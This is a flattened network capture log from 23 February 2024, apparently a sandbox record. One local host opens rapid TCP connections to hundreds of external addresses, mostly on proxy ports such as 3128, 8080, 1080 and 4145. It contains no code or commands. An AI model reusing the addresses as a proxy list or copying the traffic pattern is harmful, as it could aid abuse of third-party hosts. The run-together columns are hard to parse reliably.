                                                                                                      Feb 23, 2024 09:45:15.217710018 CET4981820056192.168.2.4103.215.139.32
                                                                                                      Feb 23, 2024 09:45:15.218261003 CET604749733107.181.148.187192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.218943119 CET4981946859192.168.2.4167.86.69.142
                                                                                                      Feb 23, 2024 09:45:15.221045017 CET4982052982192.168.2.4188.165.237.26
                                                                                                      Feb 23, 2024 09:45:15.223368883 CET41454979872.195.114.169192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.223400116 CET498218587192.168.2.4178.62.103.49
                                                                                                      Feb 23, 2024 09:45:15.223454952 CET497984145192.168.2.472.195.114.169
                                                                                                      Feb 23, 2024 09:45:15.229739904 CET4982223670192.168.2.4161.97.173.42
                                                                                                      Feb 23, 2024 09:45:15.230519056 CET80804977491.205.197.226192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.230695009 CET497748080192.168.2.491.205.197.226
                                                                                                      Feb 23, 2024 09:45:15.230982065 CET497748080192.168.2.491.205.197.226
                                                                                                      Feb 23, 2024 09:45:15.231924057 CET498233180192.168.2.445.179.71.90
                                                                                                      Feb 23, 2024 09:45:15.233710051 CET498245678192.168.2.441.90.242.102
                                                                                                      Feb 23, 2024 09:45:15.234173059 CET1041749790165.225.32.114192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.234261990 CET4979010417192.168.2.4165.225.32.114
                                                                                                      Feb 23, 2024 09:45:15.234656096 CET4979010417192.168.2.4165.225.32.114
                                                                                                      Feb 23, 2024 09:45:15.239989996 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.240119934 CET4978380192.168.2.496.114.36.9
                                                                                                      Feb 23, 2024 09:45:15.245018005 CET121294980167.43.227.227192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.251243114 CET4978380192.168.2.496.114.36.9
                                                                                                      Feb 23, 2024 09:45:15.252005100 CET108049744221.231.13.198192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.252074003 CET497441080192.168.2.4221.231.13.198
                                                                                                      Feb 23, 2024 09:45:15.252376080 CET497441080192.168.2.4221.231.13.198
                                                                                                      Feb 23, 2024 09:45:15.253315926 CET30214980572.10.164.178192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.253554106 CET4982580192.168.2.4104.16.221.57
                                                                                                      Feb 23, 2024 09:45:15.255393028 CET4982630001192.168.2.4111.3.102.135
                                                                                                      Feb 23, 2024 09:45:15.255990028 CET498273128192.168.2.4154.83.10.137
                                                                                                      Feb 23, 2024 09:45:15.257703066 CET498288080192.168.2.4103.247.21.98
                                                                                                      Feb 23, 2024 09:45:15.262260914 CET498299090192.168.2.4189.240.60.171
                                                                                                      Feb 23, 2024 09:45:15.263474941 CET414549785199.102.107.145192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.263564110 CET497854145192.168.2.4199.102.107.145
                                                                                                      Feb 23, 2024 09:45:15.263973951 CET497854145192.168.2.4199.102.107.145
                                                                                                      Feb 23, 2024 09:45:15.264478922 CET498301976192.168.2.441.65.236.39
                                                                                                      Feb 23, 2024 09:45:15.265989065 CET4983180192.168.2.441.111.187.214
                                                                                                      Feb 23, 2024 09:45:15.267966986 CET498323128192.168.2.4212.77.163.196
                                                                                                      Feb 23, 2024 09:45:15.270468950 CET4983310471192.168.2.4167.172.86.46
                                                                                                      Feb 23, 2024 09:45:15.271497965 CET4983410011192.168.2.467.43.227.227
                                                                                                      Feb 23, 2024 09:45:15.272721052 CET808049756102.212.86.57192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.272813082 CET497568080192.168.2.4102.212.86.57
                                                                                                      Feb 23, 2024 09:45:15.272914886 CET414549751222.124.130.198192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.272938967 CET414549787199.102.105.242192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.272953987 CET360149788141.94.174.6192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.273049116 CET497883601192.168.2.4141.94.174.6
                                                                                                      Feb 23, 2024 09:45:15.273050070 CET497874145192.168.2.4199.102.105.242
                                                                                                      Feb 23, 2024 09:45:15.273263931 CET497568080192.168.2.4102.212.86.57
                                                                                                      Feb 23, 2024 09:45:15.273549080 CET497874145192.168.2.4199.102.105.242
                                                                                                      Feb 23, 2024 09:45:15.273817062 CET497883601192.168.2.4141.94.174.6
                                                                                                      Feb 23, 2024 09:45:15.274080038 CET498358080192.168.2.4107.178.9.186
                                                                                                      Feb 23, 2024 09:45:15.276251078 CET4983613629192.168.2.4113.53.29.228
                                                                                                      Feb 23, 2024 09:45:15.279434919 CET4983780192.168.2.4159.65.245.255
                                                                                                      Feb 23, 2024 09:45:15.281400919 CET498385678192.168.2.4116.118.98.9
                                                                                                      Feb 23, 2024 09:45:15.283364058 CET4983959341192.168.2.4200.6.175.10
                                                                                                      Feb 23, 2024 09:45:15.284774065 CET4984046849192.168.2.4162.241.46.54
                                                                                                      Feb 23, 2024 09:45:15.288089037 CET4984180192.168.2.4172.67.182.83
                                                                                                      Feb 23, 2024 09:45:15.288480997 CET8049791104.16.108.149192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.288501024 CET8049791104.16.108.149192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.288979053 CET4979180192.168.2.4104.16.108.149
                                                                                                      Feb 23, 2024 09:45:15.289222956 CET8049791104.16.108.149192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.289247036 CET49842999192.168.2.4201.77.108.1
                                                                                                      Feb 23, 2024 09:45:15.289278984 CET4979180192.168.2.4104.16.108.149
                                                                                                      Feb 23, 2024 09:45:15.292418003 CET49843999192.168.2.4201.174.175.82
                                                                                                      Feb 23, 2024 09:45:15.293890953 CET498445678192.168.2.489.161.90.203
                                                                                                      Feb 23, 2024 09:45:15.295974016 CET4984580192.168.2.4103.152.116.82
                                                                                                      Feb 23, 2024 09:45:15.298496008 CET4984643110192.168.2.489.22.17.62
                                                                                                      Feb 23, 2024 09:45:15.300379038 CET4984732770192.168.2.494.130.181.59
                                                                                                      Feb 23, 2024 09:45:15.302016973 CET498486764192.168.2.4198.105.111.86
                                                                                                      Feb 23, 2024 09:45:15.303808928 CET4984929466192.168.2.466.228.33.190
                                                                                                      Feb 23, 2024 09:45:15.304852962 CET4985026777192.168.2.4185.129.250.183
                                                                                                      Feb 23, 2024 09:45:15.309365988 CET498514145192.168.2.424.249.199.4
                                                                                                      Feb 23, 2024 09:45:15.310009956 CET498528181192.168.2.4188.235.0.207
                                                                                                      Feb 23, 2024 09:45:15.311887980 CET498533128192.168.2.446.101.102.134
                                                                                                      Feb 23, 2024 09:45:15.312251091 CET4992249740159.223.71.71192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.312339067 CET4974049922192.168.2.4159.223.71.71
                                                                                                      Feb 23, 2024 09:45:15.312741041 CET4974049922192.168.2.4159.223.71.71
                                                                                                      Feb 23, 2024 09:45:15.314554930 CET498545678192.168.2.4110.78.164.224
                                                                                                      Feb 23, 2024 09:45:15.316399097 CET498554153192.168.2.4103.60.137.17
                                                                                                      Feb 23, 2024 09:45:15.319427013 CET498578080192.168.2.479.174.188.153
                                                                                                      Feb 23, 2024 09:45:15.319427967 CET4985680192.168.2.450.174.145.10
                                                                                                      Feb 23, 2024 09:45:15.320800066 CET3128498073.9.71.167192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.320919037 CET498073128192.168.2.43.9.71.167
                                                                                                      Feb 23, 2024 09:45:15.321115971 CET498073128192.168.2.43.9.71.167
                                                                                                      Feb 23, 2024 09:45:15.322626114 CET4985880192.168.2.48.217.118.156
                                                                                                      Feb 23, 2024 09:45:15.323297024 CET804978180.228.235.6192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.324064970 CET4985980192.168.2.4146.59.243.214
                                                                                                      Feb 23, 2024 09:45:15.326807976 CET4986019050192.168.2.451.83.190.248
                                                                                                      Feb 23, 2024 09:45:15.328058004 CET498618080192.168.2.4102.132.54.151
                                                                                                      Feb 23, 2024 09:45:15.329124928 CET4986237379192.168.2.4167.86.102.169
                                                                                                      Feb 23, 2024 09:45:15.331388950 CET498638080192.168.2.4101.255.166.2
                                                                                                      Feb 23, 2024 09:45:15.331789017 CET498644145192.168.2.472.37.216.68
                                                                                                      Feb 23, 2024 09:45:15.332896948 CET498655678192.168.2.480.54.62.254
                                                                                                      Feb 23, 2024 09:45:15.334103107 CET4986680192.168.2.4104.20.225.218
                                                                                                      Feb 23, 2024 09:45:15.335206032 CET4986783192.168.2.445.119.113.62
                                                                                                      Feb 23, 2024 09:45:15.336319923 CET4986880192.168.2.4104.19.235.10
                                                                                                      Feb 23, 2024 09:45:15.337299109 CET4986980192.168.2.4104.25.87.42
                                                                                                      Feb 23, 2024 09:45:15.338463068 CET498703128192.168.2.491.149.224.168
                                                                                                      Feb 23, 2024 09:45:15.339649916 CET498713128192.168.2.445.159.150.23
                                                                                                      Feb 23, 2024 09:45:15.340231895 CET4987280192.168.2.4172.67.38.96
                                                                                                      Feb 23, 2024 09:45:15.340930939 CET8049825104.16.221.57192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.341028929 CET4982580192.168.2.4104.16.221.57
                                                                                                      Feb 23, 2024 09:45:15.341388941 CET498731976192.168.2.441.65.55.10
                                                                                                      Feb 23, 2024 09:45:15.341479063 CET4982580192.168.2.4104.16.221.57
                                                                                                      Feb 23, 2024 09:45:15.343501091 CET498751080192.168.2.494.131.107.45
                                                                                                      Feb 23, 2024 09:45:15.343501091 CET4987480192.168.2.4203.32.120.202
                                                                                                      Feb 23, 2024 09:45:15.344557047 CET4987649401192.168.2.4162.241.46.40
                                                                                                      Feb 23, 2024 09:45:15.345618963 CET498772929192.168.2.472.10.164.178
                                                                                                      Feb 23, 2024 09:45:15.346889973 CET498786331192.168.2.472.10.164.178
                                                                                                      Feb 23, 2024 09:45:15.347347021 CET49879443192.168.2.443.153.175.43
                                                                                                      Feb 23, 2024 09:45:15.347392082 CET4434987943.153.175.43192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.347477913 CET49879443192.168.2.443.153.175.43
                                                                                                      Feb 23, 2024 09:45:15.348139048 CET49879443192.168.2.443.153.175.43
                                                                                                      Feb 23, 2024 09:45:15.348174095 CET4434987943.153.175.43192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.348226070 CET4434987943.153.175.43192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.348743916 CET116734981350.63.13.3192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.348828077 CET4981311673192.168.2.450.63.13.3
                                                                                                      Feb 23, 2024 09:45:15.348967075 CET498808080192.168.2.4103.163.80.14
                                                                                                      Feb 23, 2024 09:45:15.349215031 CET4981311673192.168.2.450.63.13.3
                                                                                                      Feb 23, 2024 09:45:15.350564957 CET1718249775139.99.9.218192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.354268074 CET567849760103.134.38.89192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.355179071 CET498819603192.168.2.4192.99.37.195
                                                                                                      Feb 23, 2024 09:45:15.355195999 CET4988232650192.168.2.4103.176.116.171
                                                                                                      Feb 23, 2024 09:45:15.355237961 CET497605678192.168.2.4103.134.38.89
                                                                                                      Feb 23, 2024 09:45:15.355576038 CET497605678192.168.2.4103.134.38.89
                                                                                                      Feb 23, 2024 09:45:15.358570099 CET4988380192.168.2.452.191.208.232
                                                                                                      Feb 23, 2024 09:45:15.358661890 CET1041749790165.225.32.114192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.358675957 CET1041749790165.225.32.114192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.358864069 CET4979010417192.168.2.4165.225.32.114
                                                                                                      Feb 23, 2024 09:45:15.359735966 CET4988412519192.168.2.4132.148.128.8
                                                                                                      Feb 23, 2024 09:45:15.359900951 CET804981450.172.23.10192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.361157894 CET498858080192.168.2.4185.38.111.1
                                                                                                      Feb 23, 2024 09:45:15.361191034 CET8049786154.113.121.60192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.361965895 CET4988647016192.168.2.437.187.143.172
                                                                                                      Feb 23, 2024 09:45:15.363399982 CET4988731683192.168.2.4198.57.195.42
                                                                                                      Feb 23, 2024 09:45:15.363665104 CET804975979.10.114.97192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.363871098 CET804975979.10.114.97192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.364420891 CET4988858028192.168.2.494.232.11.178
                                                                                                      Feb 23, 2024 09:45:15.364474058 CET4975980192.168.2.479.10.114.97
                                                                                                      Feb 23, 2024 09:45:15.364665985 CET804975979.10.114.97192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.364831924 CET4975980192.168.2.479.10.114.97
                                                                                                      Feb 23, 2024 09:45:15.366111040 CET4988951025192.168.2.4109.123.254.43
                                                                                                      Feb 23, 2024 09:45:15.366677046 CET100114983467.43.227.227192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.367290020 CET4989042801192.168.2.4166.62.87.148
                                                                                                      Feb 23, 2024 09:45:15.368417978 CET4989145365192.168.2.4142.93.151.99
                                                                                                      Feb 23, 2024 09:45:15.369318008 CET498925784192.168.2.4160.153.245.187
                                                                                                      Feb 23, 2024 09:45:15.369604111 CET325649768125.87.82.86192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.371059895 CET4989356862192.168.2.4166.62.53.45
                                                                                                      Feb 23, 2024 09:45:15.371062040 CET4989431979192.168.2.451.77.73.67
                                                                                                      Feb 23, 2024 09:45:15.372132063 CET498958080192.168.2.4171.97.12.175
                                                                                                      Feb 23, 2024 09:45:15.373871088 CET498962589192.168.2.472.10.160.90
                                                                                                      Feb 23, 2024 09:45:15.373871088 CET4989760808192.168.2.4210.61.216.63
                                                                                                      Feb 23, 2024 09:45:15.374784946 CET4989832241192.168.2.41.20.137.82
                                                                                                      Feb 23, 2024 09:45:15.376104116 CET8049841172.67.182.83192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.376240969 CET4984180192.168.2.4172.67.182.83
                                                                                                      Feb 23, 2024 09:45:15.376293898 CET4989932423192.168.2.450.63.12.101
                                                                                                      Feb 23, 2024 09:45:15.376413107 CET8049791104.16.108.149192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.376439095 CET4984180192.168.2.4172.67.182.83
                                                                                                      Feb 23, 2024 09:45:15.376964092 CET499008080192.168.2.4103.167.69.94
                                                                                                      Feb 23, 2024 09:45:15.377892017 CET499017302192.168.2.4221.226.109.229
                                                                                                      Feb 23, 2024 09:45:15.378865004 CET499024145192.168.2.446.109.146.244
                                                                                                      Feb 23, 2024 09:45:15.379782915 CET4990380192.168.2.4159.89.182.147
                                                                                                      Feb 23, 2024 09:45:15.379992962 CET858749821178.62.103.49192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.380714893 CET499041080192.168.2.478.40.104.5
                                                                                                      Feb 23, 2024 09:45:15.382874966 CET499064145192.168.2.445.112.125.58
                                                                                                      Feb 23, 2024 09:45:15.382874012 CET499053128192.168.2.4104.164.183.187
                                                                                                      Feb 23, 2024 09:45:15.383555889 CET612049811213.252.245.221192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.383743048 CET498116120192.168.2.4213.252.245.221
                                                                                                      Feb 23, 2024 09:45:15.384031057 CET498116120192.168.2.4213.252.245.221
                                                                                                      Feb 23, 2024 09:45:15.384246111 CET499076095192.168.2.467.43.236.20
                                                                                                      Feb 23, 2024 09:45:15.386008024 CET4990980192.168.2.450.170.90.25
                                                                                                      Feb 23, 2024 09:45:15.386018038 CET49908999192.168.2.445.225.184.206
                                                                                                      Feb 23, 2024 09:45:15.387561083 CET4991018072192.168.2.4109.123.254.43
                                                                                                      Feb 23, 2024 09:45:15.388448000 CET4991154450192.168.2.4171.226.88.162
                                                                                                      Feb 23, 2024 09:45:15.389295101 CET4991233427192.168.2.491.135.80.66
                                                                                                      Feb 23, 2024 09:45:15.390252113 CET499137878192.168.2.4175.106.10.227
                                                                                                      Feb 23, 2024 09:45:15.391683102 CET499141976192.168.2.441.128.148.78
                                                                                                      Feb 23, 2024 09:45:15.391685009 CET499153128192.168.2.4182.18.140.17
                                                                                                      Feb 23, 2024 09:45:15.392692089 CET604749733107.181.148.187192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.392745018 CET604749733107.181.148.187192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.392803907 CET497336047192.168.2.4107.181.148.187
                                                                                                      Feb 23, 2024 09:45:15.393073082 CET497336047192.168.2.4107.181.148.187
                                                                                                      Feb 23, 2024 09:45:15.394241095 CET4991632650192.168.2.441.217.223.145
                                                                                                      Feb 23, 2024 09:45:15.395211935 CET4991714462192.168.2.4185.129.250.183
                                                                                                      Feb 23, 2024 09:45:15.396137953 CET4991826077192.168.2.472.10.160.92
                                                                                                      Feb 23, 2024 09:45:15.396878958 CET41454985124.249.199.4192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.397061110 CET498514145192.168.2.424.249.199.4
                                                                                                      Feb 23, 2024 09:45:15.397820950 CET4991942325192.168.2.4139.99.9.218
                                                                                                      Feb 23, 2024 09:45:15.399403095 CET499208080192.168.2.4103.184.54.42
                                                                                                      Feb 23, 2024 09:45:15.412067890 CET4992180192.168.2.472.52.217.188
                                                                                                      Feb 23, 2024 09:45:15.412108898 CET499223128192.168.2.4195.138.90.226
                                                                                                      Feb 23, 2024 09:45:15.413535118 CET4992341041192.168.2.446.182.6.69
                                                                                                      Feb 23, 2024 09:45:15.414525032 CET499243128192.168.2.4154.83.11.52
                                                                                                      Feb 23, 2024 09:45:15.414777994 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.415545940 CET499258080192.168.2.4103.141.109.237
                                                                                                      Feb 23, 2024 09:45:15.416764975 CET499263128192.168.2.4104.165.169.83
                                                                                                      Feb 23, 2024 09:45:15.417329073 CET4992780192.168.2.465.21.131.27
                                                                                                      Feb 23, 2024 09:45:15.418770075 CET804978396.114.36.9192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.419132948 CET499281599192.168.2.4161.97.147.193
                                                                                                      Feb 23, 2024 09:45:15.419794083 CET4978380192.168.2.496.114.36.9
                                                                                                      Feb 23, 2024 09:45:15.420275927 CET499299002192.168.2.4120.197.40.219
                                                                                                      Feb 23, 2024 09:45:15.421243906 CET4993080192.168.2.4125.141.151.83
                                                                                                      Feb 23, 2024 09:45:15.421789885 CET8049866104.20.225.218192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.422024012 CET4986680192.168.2.4104.20.225.218
                                                                                                      Feb 23, 2024 09:45:15.422228098 CET4986680192.168.2.4104.20.225.218
                                                                                                      Feb 23, 2024 09:45:15.422565937 CET4993153672192.168.2.472.167.221.145
                                                                                                      Feb 23, 2024 09:45:15.423695087 CET8049868104.19.235.10192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.423723936 CET4993221346192.168.2.4138.197.92.110
                                                                                                      Feb 23, 2024 09:45:15.423808098 CET4986880192.168.2.4104.19.235.10
                                                                                                      Feb 23, 2024 09:45:15.423959970 CET804985650.174.145.10192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.424047947 CET4986880192.168.2.4104.19.235.10
                                                                                                      Feb 23, 2024 09:45:15.424670935 CET4993351778192.168.2.4192.169.226.96
                                                                                                      Feb 23, 2024 09:45:15.424695969 CET8049869104.25.87.42192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.424787998 CET4986980192.168.2.4104.25.87.42
                                                                                                      Feb 23, 2024 09:45:15.424987078 CET4986980192.168.2.4104.25.87.42
                                                                                                      Feb 23, 2024 09:45:15.426178932 CET49934999192.168.2.445.233.67.226
                                                                                                      Feb 23, 2024 09:45:15.427556992 CET8049872172.67.38.96192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.428168058 CET4987280192.168.2.4172.67.38.96
                                                                                                      Feb 23, 2024 09:45:15.428806067 CET8049825104.16.221.57192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.428819895 CET8049825104.16.221.57192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.428985119 CET8049825104.16.221.57192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.429178953 CET4982580192.168.2.4104.16.221.57
                                                                                                      Feb 23, 2024 09:45:15.429574966 CET3265049789154.79.254.236192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.430784941 CET8049874203.32.120.202192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.430967093 CET4987480192.168.2.4203.32.120.202
                                                                                                      Feb 23, 2024 09:45:15.432275057 CET4982580192.168.2.4104.16.221.57
                                                                                                      Feb 23, 2024 09:45:15.433031082 CET4987280192.168.2.4172.67.38.96
                                                                                                      Feb 23, 2024 09:45:15.433646917 CET414549785199.102.107.145192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.433862925 CET414549785199.102.107.145192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.434818983 CET499354145192.168.2.4199.102.107.145
                                                                                                      Feb 23, 2024 09:45:15.435105085 CET4987480192.168.2.4203.32.120.202
                                                                                                      Feb 23, 2024 09:45:15.435441971 CET499361080192.168.2.492.247.31.130
                                                                                                      Feb 23, 2024 09:45:15.436557055 CET49937999192.168.2.4201.182.251.140
                                                                                                      Feb 23, 2024 09:45:15.437509060 CET4993835196192.168.2.4167.86.69.142
                                                                                                      Feb 23, 2024 09:45:15.438440084 CET499398080192.168.2.4103.76.104.30
                                                                                                      Feb 23, 2024 09:45:15.439651966 CET499408080192.168.2.4185.172.212.233
                                                                                                      Feb 23, 2024 09:45:15.440275908 CET4994149314192.168.2.4208.87.131.151
                                                                                                      Feb 23, 2024 09:45:15.440490961 CET29294987772.10.164.178192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.441262007 CET499428080192.168.2.4192.46.229.111
                                                                                                      Feb 23, 2024 09:45:15.441910982 CET63314987872.10.164.178192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.442259073 CET4994380192.168.2.4202.5.16.44
                                                                                                      Feb 23, 2024 09:45:15.442485094 CET414549787199.102.105.242192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.442605972 CET414549787199.102.105.242192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.443881035 CET499445769192.168.2.467.43.227.228
                                                                                                      Feb 23, 2024 09:45:15.444730997 CET499454145192.168.2.4199.102.105.242
                                                                                                      Feb 23, 2024 09:45:15.446007013 CET4994680192.168.2.450.174.214.218
                                                                                                      Feb 23, 2024 09:45:15.446985960 CET499478089192.168.2.4117.57.93.135
                                                                                                      Feb 23, 2024 09:45:15.448894024 CET499493503192.168.2.423.225.72.125
                                                                                                      Feb 23, 2024 09:45:15.448895931 CET4994812005192.168.2.4148.66.130.53
                                                                                                      Feb 23, 2024 09:45:15.449839115 CET499504145192.168.2.4168.227.158.41
                                                                                                      Feb 23, 2024 09:45:15.450788975 CET49951999192.168.2.4190.120.254.233
                                                                                                      Feb 23, 2024 09:45:15.451757908 CET360149788141.94.174.6192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.451769114 CET360149788141.94.174.6192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.451780081 CET360149788141.94.174.6192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.451842070 CET497883601192.168.2.4141.94.174.6
                                                                                                      Feb 23, 2024 09:45:15.452495098 CET497883601192.168.2.4141.94.174.6
                                                                                                      Feb 23, 2024 09:45:15.453459024 CET804983141.111.187.214192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.453625917 CET4983180192.168.2.441.111.187.214
                                                                                                      Feb 23, 2024 09:45:15.453768015 CET80804977491.205.197.226192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.453917980 CET4983180192.168.2.441.111.187.214
                                                                                                      Feb 23, 2024 09:45:15.454160929 CET499522941192.168.2.467.43.236.20
                                                                                                      Feb 23, 2024 09:45:15.455327034 CET4995322035192.168.2.467.43.227.228
                                                                                                      Feb 23, 2024 09:45:15.456832886 CET80804977491.205.197.226192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.456855059 CET80804977491.205.197.226192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.456960917 CET497748080192.168.2.491.205.197.226
                                                                                                      Feb 23, 2024 09:45:15.458523035 CET497748080192.168.2.491.205.197.226
                                                                                                      Feb 23, 2024 09:45:15.462354898 CET676449848198.105.111.86192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.463134050 CET498486764192.168.2.4198.105.111.86
                                                                                                      Feb 23, 2024 09:45:15.464387894 CET8049841172.67.182.83192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.464406967 CET8049841172.67.182.83192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.465080976 CET8049841172.67.182.83192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.465439081 CET4984180192.168.2.4172.67.182.83
                                                                                                      Feb 23, 2024 09:45:15.465711117 CET498486764192.168.2.4198.105.111.86
                                                                                                      Feb 23, 2024 09:45:15.465938091 CET4984180192.168.2.4172.67.182.83
                                                                                                      Feb 23, 2024 09:45:15.466042995 CET49954999192.168.2.4190.113.40.202
                                                                                                      Feb 23, 2024 09:45:15.468223095 CET88884979647.114.101.57192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.468250036 CET499558080192.168.2.450.193.36.173
                                                                                                      Feb 23, 2024 09:45:15.468305111 CET497968888192.168.2.447.114.101.57
                                                                                                      Feb 23, 2024 09:45:15.468545914 CET497968888192.168.2.447.114.101.57
                                                                                                      Feb 23, 2024 09:45:15.468800068 CET25894989672.10.160.90192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.468949080 CET499564145192.168.2.4118.67.216.94
                                                                                                      Feb 23, 2024 09:45:15.469986916 CET4995742171192.168.2.4158.101.1.100
                                                                                                      Feb 23, 2024 09:45:15.471043110 CET4995857520192.168.2.441.242.90.3
                                                                                                      Feb 23, 2024 09:45:15.472203970 CET499591080192.168.2.4168.138.66.48
                                                                                                      Feb 23, 2024 09:45:15.473314047 CET4996056238192.168.2.451.210.4.123
                                                                                                      Feb 23, 2024 09:45:15.474736929 CET327704984794.130.181.59192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.474895954 CET4984732770192.168.2.494.130.181.59
                                                                                                      Feb 23, 2024 09:45:15.483031988 CET3128498073.9.71.167192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.483078003 CET60954990767.43.236.20192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.483160973 CET1041749790165.225.32.114192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.483179092 CET1041749790165.225.32.114192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.483228922 CET1041749790165.225.32.114192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.483269930 CET1041749790165.225.32.114192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.483288050 CET4536549891142.93.151.99192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.483288050 CET4979010417192.168.2.4165.225.32.114
                                                                                                      Feb 23, 2024 09:45:15.483346939 CET4979010417192.168.2.4165.225.32.114
                                                                                                      Feb 23, 2024 09:45:15.483779907 CET31284985346.101.102.134192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.484761953 CET499614153192.168.2.4183.89.176.18
                                                                                                      Feb 23, 2024 09:45:15.484761953 CET499624153192.168.2.4178.252.197.64
                                                                                                      Feb 23, 2024 09:45:15.485061884 CET31284981513.234.24.116192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.485228062 CET498153128192.168.2.413.234.24.116
                                                                                                      Feb 23, 2024 09:45:15.491213083 CET41454986472.37.216.68192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.492042065 CET260774991872.10.160.92192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.496258974 CET804990950.170.90.25192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.496467113 CET4984732770192.168.2.494.130.181.59
                                                                                                      Feb 23, 2024 09:45:15.496467113 CET498153128192.168.2.413.234.24.116
                                                                                                      Feb 23, 2024 09:45:15.501893997 CET4996380192.168.2.4104.19.233.117
                                                                                                      Feb 23, 2024 09:45:15.503875017 CET49964543192.168.2.48.213.137.155
                                                                                                      Feb 23, 2024 09:45:15.505398989 CET1251949884132.148.128.8192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.505424976 CET499658089192.168.2.4117.69.236.86
                                                                                                      Feb 23, 2024 09:45:15.505522013 CET4988412519192.168.2.4132.148.128.8
                                                                                                      Feb 23, 2024 09:45:15.507390976 CET4988412519192.168.2.4132.148.128.8
                                                                                                      Feb 23, 2024 09:45:15.509830952 CET8049866104.20.225.218192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.509898901 CET8049866104.20.225.218192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.510138035 CET8049866104.20.225.218192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.511353016 CET8049868104.19.235.10192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.511368990 CET8049868104.19.235.10192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.511384964 CET4986680192.168.2.4104.20.225.218
                                                                                                      Feb 23, 2024 09:45:15.511564970 CET8049868104.19.235.10192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.512332916 CET8049869104.25.87.42192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.512350082 CET8049869104.25.87.42192.168.2.4
                                                                                                      Feb 23, 2024 09:45:15.512491941 CET8049869104.25.87.42192.168.2.4
